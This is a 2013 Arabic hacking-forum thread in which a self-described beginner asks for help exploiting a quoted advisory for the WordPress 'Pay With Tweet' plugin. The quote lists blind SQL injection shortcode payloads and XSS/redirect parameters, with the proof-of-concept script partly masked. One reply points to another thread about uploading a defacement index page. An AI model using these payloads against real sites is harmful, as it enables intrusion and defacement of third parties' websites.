:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   مساعدة في استغلال ثغرة Wp ! (http://www.vbspiders.com/vb/t66984.html)

Sh.Jalilo.Sh 02-15-2013 12:33 AM
مساعدة في استغلال ثغرة Wp !
 
الســــــــلآم عليــــــكم ورحمـــة الله
إخــــواني العنـــاكب المـــرجو مســاعدتي //
في إستغلال هــذه الثغـــرة / انـا لم أفــهم عليــها لآنــي مبتدأ.

اقتباس:
# Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012

# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugi...-tweet.1.1.zip

# Version: 1.1


1) Blind SQL Injection in shortcode:
Short code parameter 'id' is prone to blind sqli,

you need to be able to write a post/page to exploit this:


[paywithtweet id="1' AND 1=2"]
[paywithtweet id="1' AND 1=1"]


2) Multiple XSS in pay.php

http://target.com/wp-content/plugins...et.php/pay.php


After connecting to twitter:
?link=&22></input>[XSS]

After submitting the tweet:
?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS]


The final download link will be replaced with [REDIRECT-TO-URL]


POC: pay.php?link=%22></input>***************(********.******)</script>&title=***************(********.******)</script>&dl=http://brindi.si%27">***************(********.******)</script>
وشكـــرا للجميـع :2:

Mr-black-laayoune 02-15-2013 09:14 PM
رد: مساعدة في استغلال ثغرة Wp !
 
انــــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــــا ايضا الاخوا،،،،،،نـــــي احتا ... ج مساعدتكم

:2: فـــــــ]ي هـــــــذا الموضوع :2:
:2: :2::2::2::2:
:2::2::2: :2:
:2: :2: :2:
:clap::clap:
:alla:

MaFia 02-17-2013 01:16 PM
رد: مساعدة في استغلال ثغرة Wp !
 
الثغره Cross site script
شوف هنا
http://www.vbspiders.com/vb/t24757.html

وهنا موضوع طرحت فيه كود رفع اندكس على الموقع بدون التوجيه لاي موقع اخر

http://www.vbspiders.com/vb/t65367.html


الساعة الآن 02:40 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0